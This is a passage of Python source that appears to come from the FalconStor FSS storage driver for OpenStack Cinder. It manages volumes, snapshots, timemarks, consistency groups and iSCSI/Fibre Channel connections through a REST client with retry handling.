exception.VolumeBackendAPIException(msg)\n except Exception:\n msg = _('The resource is a thin device, thin size is invalid.')\n raise exception.VolumeBackendAPIException(msg)\n\n thin_size = self._convert_size_to_mb(thin_size)\n thin_disk = dict(\n enabled=True,\n fullsizemb=sizemb)\n params.update(thinprovisioning=thin_disk)\n params.update(sizemb=thin_size)\n\n volume_name = self._get_fss_volume_name(volume)\n params.update(name=volume_name)\n return volume_name, self.FSS.create_vdev(params)\n\n def _get_fss_vid_from_name(self, volume_name, fss_type=None):\n vid = []\n output = self.FSS.list_fss_volume_info()\n try:\n if \"virtualdevices\" in output['data']:\n for item in output['data']['virtualdevices']:\n if item['name'] in volume_name:\n vid.append(item['id'])\n except Exception:\n msg = (_('Can not find cinder volume - %(volumeName)s') %\n {\"volumeName\": volume_name})\n raise exception.VolumeBackendAPIException(msg)\n\n if fss_type is not None and fss_type == FSS_SINGLE_TYPE:\n vid = ''.join(str(x) for x in vid)\n return vid\n\n def _get_fss_gid_from_name(self, group_name):\n gid = ''\n output = self.FSS.list_group_info()\n if \"snapshotgroups\" in output['data']:\n for item in output['data']['snapshotgroups']:\n if item['name'] == group_name:\n gid = item['id']\n break\n if gid == '':\n msg = (_('Can not find consistency group: %s.') % group_name)\n raise exception.VolumeBackendAPIException(msg)\n return gid\n\n def _get_fss_group_membercount(self, gid):\n membercount = 0\n output = self.FSS.list_group_info(gid)\n if \"membercount\" in output['data']:\n membercount = output['data']['membercount']\n return membercount\n\n def _get_vdev_id_from_group_id(self, group_id):\n vidlist = []\n output = self.FSS.list_group_info(group_id)\n if \"virtualdevices\" in output['data']:\n for item in output['data']['virtualdevices']:\n vidlist.append(item['id'])\n return vidlist\n\n def clone_volume(self, new_vol_name, source_volume_name):\n params = dict(storagepoolid=self.fss_defined_pool)\n volume_metadata = {}\n new_vid = ''\n vid = self._get_fss_vid_from_name(source_volume_name, FSS_SINGLE_TYPE)\n mirror_params = dict(\n category='virtual',\n selectioncriteria='anydrive',\n mirrortarget=\"virtual\"\n )\n mirror_params.update(params)\n ret1 = self.FSS.create_mirror(vid, mirror_params)\n\n if ret1:\n if ret1['rc'] != 0:\n failed_ret = self.FSS.get_fss_error_code(ret1['rc'])\n raise exception.VolumeBackendAPIException(data=failed_ret)\n\n ret2 = self.FSS.sync_mirror(vid)\n self.FSS._random_sleep()\n if ret2['rc'] == 0:\n self.FSS._check_mirror_sync_finished(vid, OPERATION_TIMEOUT)\n ret3 = self.FSS.promote_mirror(vid, new_vol_name)\n if ret3 and ret3['rc'] == 0:\n new_vid = ret3['id']\n\n volume_metadata['FSS-vid'] = new_vid\n return volume_metadata\n\n def delete_vdev(self, volume):\n volume_name = self._get_fss_volume_name(volume)\n vid = self._get_fss_vid_from_name(volume_name, FSS_SINGLE_TYPE)\n if vid:\n return self.FSS.delete_vdev(vid)\n else:\n msg = _('vid is null. FSS failed to delete volume.')\n raise exception.VolumeBackendAPIException(data=msg)\n\n def create_snapshot(self, snapshot):\n snap_metadata = {}\n volume_name = self._get_vol_name_from_snap(snapshot)\n snap_name = snapshot[\"display_name\"]\n size = snapshot['volume_size']\n vid = self._get_fss_vid_from_name(volume_name, FSS_SINGLE_TYPE)\n if not vid:\n msg = _('vid is null. FSS failed to create snapshot.')\n raise exception.VolumeBackendAPIException(data=msg)\n\n (snap, tm_policy, vdev_size) = (self.FSS.\n _check_if_snapshot_tm_exist(vid))\n\n if not snap:\n self.create_vdev_snapshot(vid, self._convert_size_to_mb(size))\n if not tm_policy:\n self.FSS.create_timemark_policy(\n vid, storagepoolid=self.fss_defined_pool)\n if not snap_name:\n snap_name = \"snap-%s\" % time.strftime('%Y%m%d%H%M%S')\n\n self.FSS.create_timemark(vid, snap_name)\n snap_metadata['fss_tm_comment'] = snap_name\n return snap_metadata\n\n def delete_snapshot(self, snapshot):\n volume_name = self._get_vol_name_from_snap(snapshot)\n snap_name = snapshot[\"display_name\"]\n vid = self._get_fss_vid_from_name(volume_name, FSS_SINGLE_TYPE)\n if not vid:\n msg = _('vid is null. FSS failed to delete snapshot')\n raise exception.VolumeBackendAPIException(data=msg)\n if not snap_name:\n if ('metadata' in snapshot and 'fss_tm_comment' in\n snapshot['metadata']):\n snap_name = snapshot['metadata']['fss_tm_comment']\n\n tm_info = self.FSS.get_timemark(vid)\n rawtimestamp = self._get_timestamp(tm_info, snap_name)\n if rawtimestamp:\n timestamp = '%s_%s' % (vid, rawtimestamp)\n self.FSS.delete_timemark(timestamp)\n\n final_tm_data = self.FSS.get_timemark(vid)\n if \"timemark\" in final_tm_data['data']:\n if not final_tm_data['data']['timemark']:\n self.FSS.delete_timemark_policy(vid)\n self.FSS.delete_vdev_snapshot(vid)\n\n def _get_timestamp(self, tm_data, encode_snap_name):\n timestamp = ''\n if \"timemark\" in tm_data['data']:\n for item in tm_data['data']['timemark']:\n if \"comment\" in item and item['comment'] == encode_snap_name:\n timestamp = item['rawtimestamp']\n break\n return timestamp\n\n def create_volume_from_snapshot(self, volume, snapshot):\n volume_metadata = {}\n volume_name = self._get_vol_name_from_snap(snapshot)\n snap_name = snapshot[\"display_name\"]\n new_vol_name = self._get_fss_volume_name(volume)\n vid = self._get_fss_vid_from_name(volume_name, FSS_SINGLE_TYPE)\n if not vid:\n msg = _('vid is null. FSS failed to create_volume_from_snapshot.')\n raise exception.VolumeBackendAPIException(data=msg)\n\n if not snap_name:\n if ('metadata' in snapshot) and ('fss_tm_comment'\n in snapshot['metadata']):\n snap_name = snapshot['metadata']['fss_tm_comment']\n\n tm_info = self.FSS.get_timemark(vid)\n rawtimestamp = self._get_timestamp(tm_info, snap_name)\n if not rawtimestamp:\n msg = _('rawtimestamp is null. FSS failed to '\n 'create_volume_from_snapshot.')\n raise exception.VolumeBackendAPIException(data=msg)\n\n timestamp = '%s_%s' % (vid, rawtimestamp)\n output = self.FSS.copy_timemark(\n timestamp, storagepoolid=self.fss_defined_pool, name=new_vol_name)\n if output['rc'] == 0:\n vid = output['id']\n self.FSS._random_sleep()\n if self.FSS._check_tm_copy_finished(vid, OPERATION_TIMEOUT):\n volume_metadata['FSS-vid'] = vid\n return volume_name, volume_metadata\n\n def extend_vdev(self, volume_name, vol_size, new_size):\n if new_size > vol_size:\n vid = self._get_fss_vid_from_name(volume_name, FSS_SINGLE_TYPE)\n size = self._convert_size_to_mb(new_size - vol_size)\n params = dict(\n action='expand',\n sizemb=size\n )\n return self.FSS.extend_vdev(vid, params)\n\n def list_volume_info(self, vid):\n return self.FSS.list_fss_volume_info(vid)\n\n def rename_vdev(self, vid, new_vol_name):\n params = dict(\n action='update',\n name=new_vol_name\n )\n return self.FSS.rename_vdev(vid, params)\n\n def assign_iscsi_vdev(self, client_id, target_id, vid):\n params = dict(\n action=\"assign\",\n virtualdeviceids=[vid],\n iscsi=dict(target=target_id)\n )\n return self.FSS.assign_vdev(client_id, params)\n\n def assign_fc_vdev(self, client_id, vid):\n params = dict(\n action=\"assign\",\n virtualdeviceids=[vid],\n fc=dict(\n fcmapping='alltoall',\n accessmode='readwritenonexclusive')\n )\n return self.FSS.assign_vdev(client_id, params)\n\n def unassign_vdev(self, client_id, vid):\n params = dict(\n action=\"unassign\",\n virtualdeviceid=vid\n )\n return self.FSS.unassign_vdev(client_id, params)\n\n def _create_vdev_snapshot(self, volume_name, size):\n vid = self._get_fss_vid_from_name(volume_name, FSS_SINGLE_TYPE)\n return self.create_vdev_snapshot(vid, self._convert_size_to_mb(size))\n\n def create_vdev_snapshot(self, vid, size):\n params = dict(\n idlist=[vid],\n selectioncriteria='anydrive',\n policy='alwayswrite',\n sizemb=size,\n storagepoolid=self.fss_defined_pool\n )\n return self.FSS.create_vdev_snapshot(params)\n\n def create_group(self, group):\n group_name = self._get_group_name_from_id(group['id'])\n params = dict(\n name=group_name\n )\n return self.FSS.create_group(params)\n\n def destroy_group(self, group):\n group_name = self._get_group_name_from_id(group['id'])\n gid = self._get_fss_gid_from_name(group_name)\n return self.FSS.destroy_group(gid)\n\n def _add_volume_to_consistency_group(self, group_id, vol_name):\n self.set_group(group_id, addvollist=[vol_name])\n\n def set_group(self, group_id, **kwargs):\n group_name = self._get_group_name_from_id(group_id)\n gid = self._get_fss_gid_from_name(group_name)\n\n join_params = dict()\n leave_params = dict()\n if kwargs.get('addvollist'):\n joing_vid = self._get_fss_vid_from_name(kwargs['addvollist'])\n join_params.update(\n action='join',\n virtualdevices=joing_vid\n )\n if kwargs.get('remvollist'):\n leave_vid = self._get_fss_vid_from_name(kwargs['remvollist'])\n leave_params.update(\n action='leave',\n virtualdevices=leave_vid\n )\n return self.FSS.set_group(gid, join_params, leave_params)\n\n def create_cgsnapshot(self, cgsnapshot):\n group_name = self._get_group_name_from_id(\n cgsnapshot['consistencygroup_id'])\n gsnap_name = self._encode_name(cgsnapshot['id'])\n gid = self._get_fss_gid_from_name(group_name)\n vidlist = self._get_vdev_id_from_group_id(gid)\n\n for vid in vidlist:\n (snap, tm_policy, sizemb) = (self.FSS.\n _check_if_snapshot_tm_exist(vid))\n if not snap:\n self.create_vdev_snapshot(vid, sizemb)\n if not tm_policy:\n self.FSS.create_timemark_policy(\n vid, storagepoolid=self.fss_defined_pool)\n\n group_tm_policy = self.FSS._check_if_group_tm_enabled(gid)\n if not group_tm_policy:\n self.create_group_timemark_policy(gid)\n\n self.create_group_timemark(gid, gsnap_name)\n\n def create_group_timemark_policy(self, gid):\n tm_params = dict(\n automatic=dict(enabled=False),\n maxtimemarkcount=MAXSNAPSHOTS\n )\n return self.FSS.create_group_timemark_policy(gid, tm_params)\n\n def create_group_timemark(self, gid, gsnap_name):\n params = dict(\n comment=gsnap_name,\n priority='medium',\n snapshotnotification=False\n )\n return self.FSS.create_group_timemark(gid, params)\n\n def delete_cgsnapshot(self, cgsnapshot):\n group_name = self._get_group_name_from_id(\n cgsnapshot['consistencygroup_id'])\n encode_snap_name = self._encode_name(cgsnapshot['id'])\n gid = self._get_fss_gid_from_name(group_name)\n\n if not gid:\n msg = _('gid is null. FSS failed to delete cgsnapshot.')\n raise exception.VolumeBackendAPIException(data=msg)\n\n if self._get_fss_group_membercount(gid) != 0:\n tm_info = self.FSS.get_group_timemark(gid)\n rawtimestamp = self._get_timestamp(tm_info, encode_snap_name)\n timestamp = '%s_%s' % (gid, rawtimestamp)\n self.delete_group_timemark(timestamp)\n\n final_tm_data = self.FSS.get_group_timemark(gid)\n if \"timemark\" in final_tm_data['data']:\n if not final_tm_data['data']['timemark']:\n self.FSS.delete_group_timemark_policy(gid)\n\n def delete_group_timemark(self, timestamp):\n params = dict(\n deleteallbefore=False\n )\n return self.FSS.delete_group_timemark(timestamp, params)\n\n def _check_iscsi_option(self):\n output = self.FSS.get_server_options()\n if \"iscsitarget\" in output['data']:\n if not output['data']['iscsitarget']:\n self.FSS.set_server_options('iscsitarget')\n\n def _check_fc_target_option(self):\n output = self.FSS.get_server_options()\n if \"fctarget\" in output['data']:\n if not output['data']['fctarget']:\n self.FSS.set_server_options('fctarget')\n\n def _check_iocluster_state(self):\n output = self.FSS.get_server_options()\n if 'iocluster' not in output['data']:\n msg = _('No iocluster information in given data.')\n LOG.error(msg)\n raise exception.VolumeBackendAPIException(data=msg)\n return output['data']['iocluster']\n\n def list_fc_target_wwpn(self):\n return self.FSS.list_fc_target_wwpn()\n\n def list_fc_client_initiators(self):\n return self.FSS.list_fc_client_initiators()\n\n def create_fc_client(self, cinder_host_name, free_initiator_wwpns):\n client_id = 0\n params = dict(\n name=cinder_host_name,\n protocoltype=[\"fc\"],\n ipaddress=self.fss_host,\n ostype='linux',\n fcpolicy=dict(\n initiators=[free_initiator_wwpns],\n vsaenabled=False\n )\n )\n client_info = self.FSS.create_client(params)\n if client_info and client_info['rc'] == 0:\n client_id = client_info['id']\n return client_id\n\n def list_iscsi_target_info(self, target_id=None):\n return self.FSS.list_iscsi_target_info(target_id)\n\n def _check_fc_host_devices_empty(self, client_id):\n is_empty = False\n output = self.FSS.list_sanclient_info(client_id)\n if 'data' not in output:\n msg = _('No target in given data.')\n LOG.error(msg)\n raise exception.VolumeBackendAPIException(data=msg)\n\n if 'fcdevices' not in output['data']:\n msg = _('No fcdevices in given data.')\n LOG.error(msg)\n raise exception.VolumeBackendAPIException(data=msg)\n\n if len(output['data']['fcdevices']) == 0:\n is_empty = True\n self.FSS.delete_client(client_id)\n return is_empty\n\n def create_iscsi_client(self, cinder_host_name, initiator):\n params = dict(\n name=cinder_host_name,\n protocoltype=[\"iscsi\"],\n ipaddress=self.fss_host,\n ostype='linux',\n iscsipolicy=dict(\n initiators=[initiator],\n authentication=dict(enabled=False,\n mutualchap=dict(enabled=False))\n )\n )\n return self.FSS.create_client(params)\n\n def create_iscsitarget(self, client_id, initiator, fss_hosts):\n params = dict(\n clientid=client_id,\n name=initiator,\n ipaddress=fss_hosts,\n accessmode='readwritenonexclusive'\n )\n return self.FSS.create_iscsitarget(params)\n\n def _get_iscsi_host(self, connector):\n target_info = self.list_iscsi_target_info()\n if 'data' not in target_info:\n msg = _('No data information in return info.')\n LOG.error(msg)\n raise exception.VolumeBackendAPIException(data=msg)\n if 'iscsitargets' not in target_info['data']:\n msg = _('No iscsitargets in return info.')\n LOG.error(msg)\n raise exception.VolumeBackendAPIException(data=msg)\n\n if target_info['data']['iscsitargets']:\n iscsitargets = target_info['data']['iscsitargets']\n for iscsitarget in iscsitargets:\n if connector[\"initiator\"] in iscsitarget[\"name\"]:\n target_id = iscsitarget[\"id\"]\n client_id = iscsitarget[\"clientid\"]\n return client_id, target_id\n return None, None\n\n def _create_iscsi_host(self, host_name, initiator, fss_hosts):\n client_id = ''\n target_id = ''\n client_info = self.create_iscsi_client(host_name, initiator)\n if client_info and client_info['rc'] == 0:\n client_id = client_info['id']\n\n target_info = self.create_iscsitarget(client_id, initiator, fss_hosts)\n if target_info['rc'] == 0:\n target_id = target_info['id']\n return client_id, target_id\n\n def _get_fc_client_initiators(self, connector):\n fc_initiators_assigned = []\n fc_available_initiator = []\n fc_initiators_info = self.list_fc_client_initiators()\n if 'data' not in fc_initiators_info:\n raise ValueError(_('No data information in return info.'))\n\n if fc_initiators_info['data']:\n fc_initiators = fc_initiators_info['data']\n for fc_initiator in fc_initiators:\n if fc_initiator['wwpn'] in connector['wwpns']:\n fc_available_initiator.append(str(fc_initiator['wwpn']))\n fc_initiators_assigned.append(dict(\n wwpn=str(fc_initiator['wwpn']),\n assigned=fc_initiator['assigned']))\n return fc_available_initiator, fc_initiators_assigned\n\n def fc_initialize_connection(self, volume, connector, fss_hosts):\n \"\"\"Connect the host and volume; return dict describing connection.\"\"\"\n vid = 0\n fc_target_info = {}\n free_fc_initiator = None\n\n volume_name = self._get_fss_volume_name(volume)\n vid = self._get_fss_vid_from_name(volume_name, FSS_SINGLE_TYPE)\n if not vid:\n msg = (_('Can not find cinder volume - %s.') % volume_name)\n raise exception.VolumeBackendAPIException(msg)\n\n available_initiator, fc_initiators_info = (\n self._get_fc_client_initiators(connector))\n\n if fc_initiators_info is None:\n msg = _('No FC initiator can be added to host.')\n LOG.error(msg)\n raise exception.VolumeBackendAPIException(data=msg)\n\n for fc_initiator in fc_initiators_info:\n value = fc_initiator['assigned']\n if len(value) == 0:\n free_fc_initiator = fc_initiator['wwpn']\n\n if free_fc_initiator is None:\n msg = _('No free FC initiator can be assigned to host.')\n LOG.error(msg)\n raise exception.VolumeBackendAPIException(data=msg)\n\n initiator = connector[\"initiator\"]\n host_name = GROUP_PREFIX + '%s-' % connector[\"host\"]\n\n initiator_name = initiator.split(':')\n idx = len(initiator_name) - 1\n client_host_name = host_name + initiator_name[\n idx] + '_FC-wwpn-' + free_fc_initiator\n\n client_id = self.create_fc_client(client_host_name, free_fc_initiator)\n\n try:\n self.assign_fc_vdev(client_id, vid)\n time.sleep(3)\n except FSSHTTPError as err:\n with excutils.save_and_reraise_exception() as ctxt:\n if (err.code == 2415984845 and \"XML_ERROR_CLIENT_EXIST\"\n in err.text):\n ctxt.reraise = False\n LOG.warning(_LW('Assign volume failed with message: %(msg)s.'),\n {\"msg\": err.reason})\n finally:\n lun = self.FSS._get_fc_client_info(client_id, vid)\n\n fc_target_info['lun'] = lun\n fc_target_info['available_initiator'] = available_initiator\n\n if not fc_target_info:\n msg = _('Failed to get iSCSI target info for the LUN: %s.')\n raise exception.VolumeBackendAPIException(data=msg % volume_name)\n return fc_target_info\n\n def fc_terminate_connection(self, volume, connector):\n client_id = 0\n volume_name = self._get_fss_volume_name(volume)\n vid = self._get_fss_vid_from_name(volume_name, FSS_SINGLE_TYPE)\n output = self.list_volume_info(vid)\n if 'data' not in output:\n msg = _('No vdev information in given data')\n LOG.error(msg)\n raise exception.VolumeBackendAPIException(data=msg)\n if 'clients' not in output['data']:\n msg = _('No clients in vdev information.')\n LOG.error(msg)\n raise exception.VolumeBackendAPIException(data=msg)\n\n client_info = output['data']['clients']\n for fcclients in client_info:\n client_id = int(fcclients['id'])\n\n if client_id == 0:\n msg = _(\n 'Can not find client id. The connection target name is %s.')\n raise exception.VolumeBackendAPIException(\n data=msg % connector[\"initiator\"])\n try:\n self.unassign_vdev(client_id, vid)\n except FSSHTTPError as err:\n with excutils.save_and_reraise_exception() as ctxt:\n if (err.code == 2415984988 and\n \"XML_ERROR_VIRTUAL_DEV_NOT_ASSIGNED_TO_iSCSI_TARGET\"\n in err.text):\n ctxt.reraise = False\n LOG.warning(_LW('Disconnection failed with message: '\n \"%(msg)s.\"), {\"msg\": err.reason})\n return client_id\n\n def initialize_connection_iscsi(self, volume, connector, fss_hosts):\n \"\"\"Connect the host and volume; return dict describing connection.\"\"\"\n vid = 0\n iscsi_target_info = {}\n self._check_iscsi_option()\n client_id, target_id = self._get_iscsi_host(connector)\n\n if target_id is None:\n initiator = connector[\"initiator\"]\n host_name = GROUP_PREFIX + '%s-' % connector[\"host\"]\n\n initiator_info = initiator.split(':')\n idx = len(initiator_info) - 1\n client_host_name = host_name + initiator_info[idx]\n\n client_id, target_id = self._create_iscsi_host(client_host_name,\n initiator,\n fss_hosts)\n volume_name = self._get_fss_volume_name(volume)\n try:\n vid = self._get_fss_vid_from_name(volume_name, FSS_SINGLE_TYPE)\n if not vid:\n msg = (_('Can not find cinder volume - %(volumeName)s.') %\n {\"volumeName\": volume_name})\n raise exception.VolumeBackendAPIException(msg)\n\n self.assign_iscsi_vdev(client_id, target_id, vid)\n time.sleep(3)\n except FSSHTTPError as err:\n with excutils.save_and_reraise_exception() as ctxt:\n if (err.code == 2415984989 and\n \"XML_ERROR_VIRTUAL_DEV_ASSIGNED_TO_iSCSI_TARGET\" in\n err.text):\n ctxt.reraise = False\n LOG.warning(_LW(\"Assign volume failed with message: %(msg)s.\"),\n {\"msg\": err.reason})\n finally:\n (lun, target_name) = self.FSS._get_iscsi_target_info(client_id,\n vid)\n iscsi_target_info['lun'] = lun\n iscsi_target_info['iqn'] = target_name\n\n if not iscsi_target_info:\n msg = _('Failed to get iSCSI target info for the LUN: %s')\n raise exception.VolumeBackendAPIException(data=msg % volume_name)\n return iscsi_target_info\n\n def terminate_connection_iscsi(self, volume, connector):\n volume_name = self._get_fss_volume_name(volume)\n vid = self._get_fss_vid_from_name(volume_name, FSS_SINGLE_TYPE)\n client_id, target_id = self._get_iscsi_host(connector)\n if not client_id:\n msg = _('Can not find client id. The connection target name '\n 'is %s.')\n raise exception.VolumeBackendAPIException(\n data=msg % connector[\"initiator\"])\n try:\n self.unassign_vdev(client_id, vid)\n except FSSHTTPError as err:\n with excutils.save_and_reraise_exception() as ctxt:\n if (err.code == 2415984988 and\n \"XML_ERROR_VIRTUAL_DEV_NOT_ASSIGNED_TO_iSCSI_TARGET\"\n in err.text):\n ctxt.reraise = False\n LOG.warning(_LW(\"Disconnection failed with message: \"\n \"%(msg)s.\"), {\"msg\": err.reason})\n finally:\n is_empty = self.FSS._check_host_mapping_status(client_id,\n target_id)\n\n if is_empty:\n self.FSS.delete_iscsi_target(target_id)\n self.FSS.delete_client(client_id)\n\n def _get_existing_volume_ref_vid(self, existing_ref):\n if 'source-id' in existing_ref:\n vid = existing_ref['source-id']\n else:\n reason = _(\"FSSISCSIDriver manage_existing requires vid to \"\n \"identify an existing volume.\")\n raise exception.ManageExistingInvalidReference(\n existing_ref=existing_ref, reason=reason)\n vdev_info = self.list_volume_info(vid)\n if not vdev_info:\n raise exception.ManageExistingInvalidReference(\n existing_ref=existing_ref,\n reason=_(\"Unable to find volume with FSS vid =%s.\") % vid)\n\n if 'data' not in vdev_info:\n msg = _('No vdev information in given data.')\n LOG.error(msg)\n raise exception.VolumeBackendAPIException(data=msg)\n if 'sizemb' not in vdev_info['data']:\n msg = _('No vdev sizemb in given data.')\n LOG.error(msg)\n raise exception.VolumeBackendAPIException(data=msg)\n\n return vdev_info['data']['sizemb']\n\n def _manage_existing_volume(self, vid, volume):\n new_vol_name = self._get_fss_volume_name(volume)\n try:\n self.rename_vdev(vid, new_vol_name)\n except FSSHTTPError as err:\n with excutils.save_and_reraise_exception() as ctxt:\n ctxt.reraise = False\n LOG.warning(_LW(\"Volume manage_existing_volume was unable \"\n \"to rename the volume, error message: %s.\"),\n err.reason)\n\n def unmanage(self, volume):\n volume_name = self._get_fss_volume_name(volume)\n unmanaged_vol_name = volume_name + \"-unmanaged\"\n try:\n vid = self._get_fss_vid_from_name(volume_name, FSS_SINGLE_TYPE)\n self.rename_vdev(vid, unmanaged_vol_name)\n except FSSHTTPError as err:\n LOG.warning(_LW(\"Volume unmanage was unable to rename the volume,\"\n \" error message: %(msg)s.\"), {\"msg\": err.reason})\n\n\nclass FSSRestCommon(object):\n def __init__(self, host, username, password, fss_debug):\n self.hostip = host\n self.username = username\n self.password = password\n self.session_id = None\n self.fss_debug = fss_debug\n\n def _fss_request(self, method, path, data=None):\n json_data = None\n url = \"http://%(ip)s/%(product)s/%(path)s\" % {\n \"ip\": self.hostip, \"product\": PRODUCT_NAME, \"path\": path}\n headers = {\"Content-Type\": \"application/json\"}\n if self.session_id is not None:\n cookie = dict(\n Cookie=SESSION_COOKIE_NAME + '=' + self.session_id\n )\n headers.update(cookie)\n\n if data is not None:\n request_body = json.dumps(data).encode(\"utf-8\")\n else:\n request_body = None\n\n connection = http_client.HTTPConnection(self.hostip, 80, timeout=60)\n\n if self.fss_debug:\n LOG.info(_LI(\"[FSS_RESTAPI]====%(method)s@url=%(url)s ====\"\n \"@request_body=%(body)s===\") % {\n \"method\": method,\n \"url\": url,\n \"body\": request_body})\n\n attempt = 1\n while True:\n connection.request(method, url, request_body, headers)\n response = connection.getresponse()\n response_body = response.read()\n if response_body:\n try:\n data = json.loads(response_body)\n json_data = json.dumps(data)\n json_data = json.loads(json_data.decode('utf8'))\n except ValueError:\n pass\n\n if self.fss_debug:\n LOG.info(_LI(\"[FSS_RESTAPI]==@json_data: %s ==\"), json_data)\n\n if response.status == 200:\n return json_data\n elif response.status == 404:\n msg = (_('FSS rest api return failed, method=%(method)s, '\n 'uri=%(url)s, response=%(response)s') % {\n \"method\": method,\n \"url\": url,\n \"response\": response_body})\n raise exception.VolumeBackendAPIException(msg)\n else:\n err_code = json_data['rc']\n if (attempt > RETRY_CNT) or (str(err_code) not in RETRY_LIST):\n err_target = (\"method=%(method)s, url=%(url)s, \"\n \"response=%(response)s\" %\n {\"method\": method, \"url\": url,\n \"response\": response_body})\n err_response = self.get_fss_error_code(err_code)\n err = dict(\n code=err_code,\n text=err_response['key'],\n reason=err_response['message']\n )\n raise FSSHTTPError(err_target, err)\n attempt += 1\n LOG.warning(_LW(\"Retry with rc: %s.\"), err_code)\n self._random_sleep(RETRY_INTERVAL)\n if err_code == 107:\n self.fss_login()\n\n def _random_sleep(self, interval=60):\n nsleep = random.randint(10, interval * 10)\n value = round(float(nsleep) / 10, 2)\n time.sleep(value)\n\n #\n # REST API session management methods\n #\n def fss_login(self):\n url = '%s/%s' % (FSS_AUTH, FSS_LOGIN)\n params = dict(\n username=self.username,\n password=self.password,\n server=self.hostip\n )\n data = self._fss_request(POST, url, params)\n if 'id' in data:\n self.session_id = data['id']\n return self.session_id\n\n #\n # Physical Adapters management methods\n #\n\n def list_physicaladapter_info(self, adapter_id=None):\n url = '%s/%s' % (FSS_PHYSICALRESOURCE, FSS_PHYSICALADAPTER)\n if adapter_id is not None:\n url = '%s/%s/%s' % (FSS_PHYSICALRESOURCE,\n FSS_PHYSICALADAPTER, adapter_id)\n return self._fss_request(GET, url)\n\n def list_fc_target_wwpn(self):\n url = '%s/%s/%s' % (FSS_PHYSICALRESOURCE, FSS_PHYSICALADAPTER,\n FSS_FC_TGT_WWPN)\n tgt_wwpn = []\n output = self._fss_request(GET, url)\n if output['data']:\n tgt_wwpns = output['data']\n for tgt_alias_wwpn in tgt_wwpns:\n tgt_wwpn.append(\n str(tgt_alias_wwpn['aliaswwpn'].replace('-', '')))\n return tgt_wwpn\n\n def list_fc_client_initiators(self):\n url = '%s/%s/%s' % (FSS_PHYSICALRESOURCE, FSS_PHYSICALADAPTER,\n FSS_FCCLIENTINITIATORS)\n return self._fss_request(GET, url)\n\n #\n # storage pool management methods\n #\n\n def list_pool_info(self, pool_id=None):\n url = '%s/%s' % (FSS_PHYSICALRESOURCE, FSS_STORAGE_POOL)\n if pool_id is not None:\n url = '%s/%s/%s' % (FSS_PHYSICALRESOURCE,\n FSS_STORAGE_POOL, pool_id)\n return self._fss_request(GET, url)\n\n #\n # Volume and snapshot management methods\n #\n\n def create_vdev(self, params):\n metadata = {}\n url = '%s/%s' % (FSS_LOGICALRESOURCE, FSS_SAN)\n output = self._fss_request(POST, url, params)\n if output:\n if output['rc'] == 0:\n metadata['FSS-vid'] = output['id']\n return metadata\n\n def _check_mirror_sync_finished(self, vid, timeout):\n starttime = time.time()\n while True:\n self._random_sleep()\n if time.time() > starttime + timeout:\n msg = (_('FSS get mirror sync timeout on vid: %s ') % vid)\n raise exception.VolumeBackendAPIException(data=msg)\n elif self._check_mirror_sync_status(vid):\n break\n\n def delete_vdev(self, vid):\n url = '%s/%s/%s' % (FSS_LOGICALRESOURCE, FSS_SAN, vid)\n return self._fss_request(DELETE, url, dict(force=True))\n\n def extend_vdev(self, vid, params):\n url = '%s/%s/%s' % (FSS_LOGICALRESOURCE, FSS_SAN, vid)\n return self._fss_request(PUT, url, params)\n\n def rename_vdev(self, vid, params):\n url = '%s/%s/%s' % (FSS_LOGICALRESOURCE, FSS_SAN, vid)\n return vid, self._fss_request(PUT, url, params)\n\n def list_fss_volume_info(self, vid=None):\n url = '%s/%s' % (FSS_LOGICALRESOURCE, FSS_SAN)\n if vid is not None:\n url = '%s/%s/%s' % (FSS_LOGICALRESOURCE, FSS_SAN, vid)\n return self._fss_request(GET, url)\n\n def _get_fss_vid_from_name(self, volume_name, fss_type=None):\n vid = []\n output = self.list_fss_volume_info()\n try:\n if \"virtualdevices\" in output['data']:\n for item in output['data']['virtualdevices']:\n if item['name'] in volume_name:\n vid.append(item['id'])\n except Exception:\n msg = (_('Can not find cinder volume - %s') % volume_name)\n raise exception.VolumeBackendAPIException(msg)\n\n if fss_type is not None and fss_type == FSS_SINGLE_TYPE:\n vid = ''.join(str(x) for x in vid)\n return vid\n\n def _check_if_snapshot_tm_exist(self, vid):\n snapshotenabled = False\n timemarkenabled = False\n sizemb = 0\n output = self.list_fss_volume_info(vid)\n if \"snapshotenabled\" in output['data']:\n snapshotenabled = output['data']['snapshotenabled']\n if \"timemarkenabled\" in output['data']:\n timemarkenabled = output['data']['timemarkenabled']\n if \"sizemb\" in output['data']:\n sizemb = output['data']['sizemb']\n return (snapshotenabled, timemarkenabled, sizemb)\n\n def create_vdev_snapshot(self, params):\n url = '%s/%s/%s' % (FSS_BATCH, FSS_LOGICALRESOURCE,\n FSS_SNAPSHOT_RESOURCE)\n return self._fss_request(POST, url, params)\n\n def create_timemark_policy(self, vid, **kwargs):\n url = '%s/%s/%s' % (FSS_BATCH, FSS_LOGICALRESOURCE, FSS_TIMEMARKPOLICY)\n params = dict(\n idlist=[vid],\n automatic=dict(enabled=False),\n maxtimemarkcount=MAXSNAPSHOTS\n )\n if kwargs.get('storagepoolid'):\n params.update(kwargs)\n return self._fss_request(POST, url, params)\n\n def create_timemark(self, vid, snap_name):\n url = '%s/%s/%s' % (FSS_LOGICALRESOURCE, FSS_TIMEMARK, vid)\n params = dict(\n comment=snap_name,\n priority='medium',\n snapshotnotification=False\n )\n return self._fss_request(POST, url, params)\n\n def get_timemark(self, vid):\n url = '%s/%s/%s' % (FSS_LOGICALRESOURCE, FSS_TIMEMARK, vid)\n return self._fss_request(GET, url)\n\n def delete_timemark(self, timestamp):\n url = '%s/%s/%s' % (FSS_LOGICALRESOURCE, FSS_TIMEMARK, timestamp)\n params = dict(\n deleteallbefore=False\n )\n return self._fss_request(DELETE, url, params)\n\n def delete_timemark_policy(self, vid):\n url = '%s/%s/%s' % (FSS_BATCH, FSS_LOGICALRESOURCE, FSS_TIMEMARKPOLICY)\n params = dict(\n idlist=[vid]\n )\n return self._fss_request(DELETE, url, params)\n\n def delete_vdev_snapshot(self, vid):\n url = '%s/%s/%s' % (FSS_BATCH, FSS_LOGICALRESOURCE,\n FSS_SNAPSHOT_RESOURCE)\n params = dict(\n idlist=[vid]\n )\n return self._fss_request(DELETE, url, params)\n\n def copy_timemark(self, timestamp, **kwargs):\n url = '%s/%s/%s' % (FSS_LOGICALRESOURCE, FSS_TIMEMARK, timestamp)\n params = dict(\n action='copy',\n includetimeviewdata=False\n )\n params.update(kwargs)\n return self._fss_request(PUT, url, params)\n\n def get_timemark_copy_status(self, vid):\n url = '%s/%s/%s?type=operationstatus' % (\n FSS_LOGICALRESOURCE, FSS_TIMEMARK, vid)\n return self._fss_request(GET, url)\n\n def _check_tm_copy_status(self, 